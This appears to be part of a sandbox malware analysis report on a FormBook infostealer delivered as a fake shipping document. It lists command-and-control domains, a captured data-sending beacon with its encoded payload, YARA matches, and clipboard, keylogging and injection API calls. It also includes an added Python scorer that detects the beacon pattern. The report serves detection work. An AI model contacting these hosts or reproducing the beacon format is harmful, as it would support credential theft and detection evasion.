            Source: global trafficHTTP traffic detected: GET /06rp/?gd=ziZdrN3wZJ2qpMxAfrlPkqpeB+M36+P6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYcz8nolH3weaQT2LRQ2gsiM78APZpluIu/QY=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.tigre777gg.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wwak/?gd=E3TGpDthwwVtcd68e7GptjCB6e8kOO0p076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUcyNJNhtpQgsemRCiUIU53imXlsG7IfaIBm8=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.personal-loans-jp8.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vnd3/?gd=xYBn5zztkuVfiCwnPAPX5/Vc6KcZvMqR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERXhxrpvJyNz8FMq3GCQE2JNk4pLMM9VfXXZw=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.quantumnests.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n59g/?a0=_6Edzvj0xtFLdH&gd=5pnE2UHiCW8ObGXd+5watRyj/n5k8DcBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ndPNw6uI/UGywwOjVsQmNLB0fJ9Ua+cFGcM= HTTP/1.1Host: www.parcelfly.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.linkbasic.net
            Source: global trafficDNS traffic detected: DNS query: www.chamadaslotgiris.net
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.mediaplug.biz
            Source: global trafficDNS traffic detected: DNS query: www.independent200.org
            Source: global trafficDNS traffic detected: DNS query: www.tigre777gg.online
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.personal-loans-jp8.xyz
            Source: global trafficDNS traffic detected: DNS query: www.quantumnests.xyz
            Source: global trafficDNS traffic detected: DNS query: www.abbabyfernando.online
            Source: global trafficDNS traffic detected: DNS query: www.parcelfly.net
            Source: global trafficDNS traffic detected: DNS query: www.siyue.xyz
            Source: unknown | HTTP traffic detected:
                POST /p5rq/ HTTP/1.1
                Host: www.masteriocp.online
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US
                Connection: close
                Content-Length: 199
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Origin: http://www.masteriocp.online
                Referer: http://www.masteriocp.online/p5rq/
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Data Raw: 67 64 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 7a 67 70 6e 4e 70 74 51 59 2b 33 76 79 50 2b 33 77 41 68 36 44 78 45 70 6d 5a 61 69 36 2b 53 6f 67 3d 3d
                Data Ascii: gd=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uzgpnNptQY+3vyP+3wAh6DxEpmZai6+Sog==
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 403 Forbidden
                Content-Type: text/plain; charset=utf-8
                Date: Sat, 14 Sep 2024 09:11:57 GMT
                Content-Length: 11
                Connection: close
                Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                Data Ascii: Bad Request
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 403 Forbidden
                Content-Type: text/plain; charset=utf-8
                Date: Sat, 14 Sep 2024 09:11:59 GMT
                Content-Length: 11
                Connection: close
                Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                Data Ascii: Bad Request
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 403 Forbidden
                Content-Type: text/plain; charset=utf-8
                Date: Sat, 14 Sep 2024 09:12:04 GMT
                Content-Length: 11
                Connection: close
                Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                Data Ascii: Bad Request
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Sat, 14 Sep 2024 09:12:45 GMT
                Server: Apache
                Content-Length: 18121
                Connection: close
                Content-Type: text/html
                Data Ascii:
                <!DOCTYPE html>
                <html lang="en" >
                <head>
                  <meta charset="UTF-8">
                  <title>404 Not Found</title>
                  <link rel="stylesheet" href="/404style.css">

                </head>
                <body>
                <!-- partial:index.partial.html -->
                <div class="main">
                  <div>
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355">
                  <g id="ocean">
                    <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/>
                    <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667">
                      <stop offset="0" stop-color="#fff"/>
                      <stop offset="1" stop-color="#b3dcdf"/>
                    </linearGradient>
                    <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/>
                    <path id="land" class="st0" d="M0 273.4h1000V354H0z"/>
                    <g id="bumps">
                      <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/>
                    <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/>
                    <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Sat, 14 Sep 2024 09:12:48 GMT
                Server: Apache
                Content-Length: 18121
                Connection: close
                Content-Type: text/html
                Data Ascii:
                <!DOCTYPE html>
                <html lang="en" >
                <head>
                  <meta charset="UTF-8">
                  <title>404 Not Found</title>
                  <link rel="stylesheet" href="/404style.css">

                </head>
                <body>
                <!-- partial:index.partial.html -->
                <div class="main">
                  <div>
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355">
                  <g id="ocean">
                    <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/>
                    <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667">
                      <stop offset="0" stop-color="#fff"/>
                      <stop offset="1" stop-color="#b3dcdf"/>
                    </linearGradient>
                    <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/>
                    <path id="land" class="st0" d="M0 273.4h1000V354H0z"/>
                    <g id="bumps">
                      <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/>
                    <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/>
                    <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Sat, 14 Sep 2024 09:12:50 GMT
                Server: Apache
                Content-Length: 18121
                Connection: close
                Content-Type: text/html
                Data Ascii:
                <!DOCTYPE html>
                <html lang="en" >
                <head>
                  <meta charset="UTF-8">
                  <title>404 Not Found</title>
                  <link rel="stylesheet" href="/404style.css">

                </head>
                <body>
                <!-- partial:index.partial.html -->
                <div class="main">
                  <div>
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355">
                  <g id="ocean">
                    <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/>
                    <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667">
                      <stop offset="0" stop-color="#fff"/>
                      <stop offset="1" stop-color="#b3dcdf"/>
                    </linearGradient>
                    <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/>
                    <path id="land" class="st0" d="M0 273.4h1000V354H0z"/>
                    <g id="bumps">
                      <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/>
                    <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/>
                    <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Sat, 14 Sep 2024 09:12:53 GMT
                Server: Apache
                Content-Length: 18121
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii:
                <!DOCTYPE html>
                <html lang="en" >
                <head>
                  <meta charset="UTF-8">
                  <title>404 Not Found</title>
                  <link rel="stylesheet" href="/404style.css">

                </head>
                <body>
                <!-- partial:index.partial.html -->
                <div class="main">
                  <div>
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355">
                  <g id="ocean">
                    <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/>
                    <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667">
                      <stop offset="0" stop-color="#fff"/>
                      <stop offset="1" stop-color="#b3dcdf"/>
                    </linearGradient>
                    <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/>
                    <path id="land" class="st0" d="M0 273.4h1000V354H0z"/>
                    <g id="bumps">
                      <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/>
                    <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/>
                    <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 1
            Source: PrWIbKXhdqUKk.exe, 00000008.00000002.3568694635.0000000004CD4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.parcelfly.net
            Source: PrWIbKXhdqUKk.exe, 00000008.00000002.3568694635.0000000004CD4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.parcelfly.net/n59g/
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2359661793.000000000800F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.3569382818.00000000065A0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567902266.0000000004CF2000.00000004.10000000.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567310528.0000000003732000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000006.00000002.3567902266.0000000004518000.00000004.10000000.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567310528.0000000002F58000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.masteriocp.online/p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E7407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E7407C
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E7427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E7427A
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E6003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E6003A
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E8CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E8CB26
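            The check-in captured above is the FormBook beacon shape: a POST to a short random path with a single gd= parameter carrying a raw base64 blob, Origin and Referer pointing back at the beacon URL itself, Connection: close beside a browser-like Accept header, and an Android User-Agent sent from a Windows host, answered by decoy 403/404 pages (one 403 carries the body "Bad Request", which is the 400 reason phrase). The scorer below turns those observations into detection logic run over constructed HTTP records. It is an added example, not part of the Joe Sandbox report and not a detection the sandbox itself runs; the record layout, the score threshold, the host_os argument and the benign intranet record are assumptions of this example, while the beacon record is rebuilt from the capture above.

```python
"""Score HTTP requests for FormBook-style check-in traffic (added example).

Heuristics, each one visible in the capture above:
  * POST whose form body is one short key carrying an undecoded base64 blob
  * Origin and Referer aimed at the beacon URL itself
  * browser-like Accept header combined with Connection: close
  * mobile/Android User-Agent emitted from a Windows endpoint
Record layout, FLAG_THRESHOLD and host_os are assumptions of this example.
"""
import base64
import re

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
FLAG_THRESHOLD = 3  # assumption: three independent hits before alerting


def is_base64_blob(value, min_len=64):
    """True for a long, well-formed base64 string (the encrypted beacon body)."""
    if len(value) < min_len or len(value) % 4 or not B64_RE.match(value):
        return False
    try:
        base64.b64decode(value)
    except ValueError:  # binascii.Error is a ValueError
        return False
    return True


def split_form_body(body):
    """Split k=v&k=v WITHOUT percent- or plus-decoding.

    FormBook sends the blob raw, so '+' and '/' must survive; a normal
    urllib parse would turn '+' into a space and defeat the base64 check.
    """
    return [p.partition("=") for p in body.split("&") if p]


def score_request(req, host_os="Windows"):
    """Return (score, reasons) for one request dict.

    req = {"method", "host", "uri", "headers": {...}, "body"}; header names
    are matched case-insensitively. host_os is what the endpoint really runs
    (known to the proxy/EDR), which the User-Agent may lie about.
    """
    if req["method"].upper() != "POST":
        return 0, []
    h = {k.lower(): v for k, v in req.get("headers", {}).items()}
    reasons = []

    parts = split_form_body(req.get("body", ""))
    if len(parts) == 1 and len(parts[0][0]) <= 3 and is_base64_blob(parts[0][2]):
        reasons.append("single short key carrying a base64 blob")

    self_url = f"http://{req['host']}{req['uri']}"
    if h.get("referer") == self_url and h.get("origin", "").rstrip("/") == f"http://{req['host']}":
        reasons.append("Origin/Referer point at the beacon URL itself")

    if "text/html" in h.get("accept", "") and h.get("connection", "").lower() == "close":
        reasons.append("browser-like Accept but Connection: close")

    ua = h.get("user-agent", "")
    if host_os.lower().startswith("win") and ("Android" in ua or "Mobile" in ua):
        reasons.append("mobile User-Agent from a Windows host")

    return len(reasons), reasons


def status_reason_mismatch(status, body):
    """True when the body is a bare reason phrase that does not belong to the
    status code, e.g. the 403 answered with 'Bad Request' in the capture."""
    phrases = {400: "Bad Request", 403: "Forbidden", 404: "Not Found"}
    b = body.strip()
    return b in phrases.values() and phrases.get(status) != b


def triage(requests, host_os="Windows"):
    """Return (host, score, reasons) for requests at or above FLAG_THRESHOLD."""
    flagged = []
    for r in requests:
        score, reasons = score_request(r, host_os)
        if score >= FLAG_THRESHOLD:
            flagged.append((r["host"], score, reasons))
    return flagged


# Constructed records: BEACON copies the request from the capture above,
# BENIGN is an invented intranet login form for contrast.
BEACON = {
    "method": "POST", "host": "www.masteriocp.online", "uri": "/p5rq/",
    "headers": {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US",
        "Connection": "close", "Content-Length": "199",
        "Content-Type": "application/x-www-form-urlencoded", "Cache-Control": "no-cache",
        "Origin": "http://www.masteriocp.online",
        "Referer": "http://www.masteriocp.online/p5rq/",
        "User-Agent": "Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) "
                      "AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36",
    },
    "body": "gd=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/"
            "eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7"
            "uzgpnNptQY+3vyP+3wAh6DxEpmZai6+Sog==",
}
BENIGN = {
    "method": "POST", "host": "intranet.example.org", "uri": "/login",
    "headers": {
        "Accept": "text/html,application/xhtml+xml", "Connection": "keep-alive",
        "Origin": "http://intranet.example.org", "Referer": "http://intranet.example.org/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/128.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": "user=alice&password=correct+horse&remember=1",
}

if __name__ == "__main__":
    for host, score, reasons in triage([BEACON, BENIGN]):
        print(f"{host}: score {score}: {'; '.join(reasons)}")
    print("decoy 403 with 'Bad Request' body:", status_reason_mismatch(403, "Bad Request"))
```

            The body is deliberately not run through a form-decoder: the beacon blob is sent raw, and the '+' characters in it would become spaces and break the base64 test. The host_os check is the one heuristic that needs context the request alone does not carry; drop it (or lower FLAG_THRESHOLD) if the sensor cannot tell what the client actually runs.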

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: This is a third-party compiled AutoIt script. (0_2_00E03B4C)
            Source: SHIPPING DOC MBL+HBL.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: SHIPPING DOC MBL+HBL.exe, 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_5dd6c1dc-6
            Source: SHIPPING DOC MBL+HBL.exe, 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_cde0112f-4
            Source: SHIPPING DOC MBL+HBL.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_28e6c405-b
            Source: SHIPPING DOC MBL+HBL.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_06c503c5-4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C4F3 NtClose,1_2_0042C4F3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,1_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03274340 NtSetContextThread,1_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03274650 NtSuspendThread,1_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272AD0 NtReadFile,1_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F30 NtCreateSection,1_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
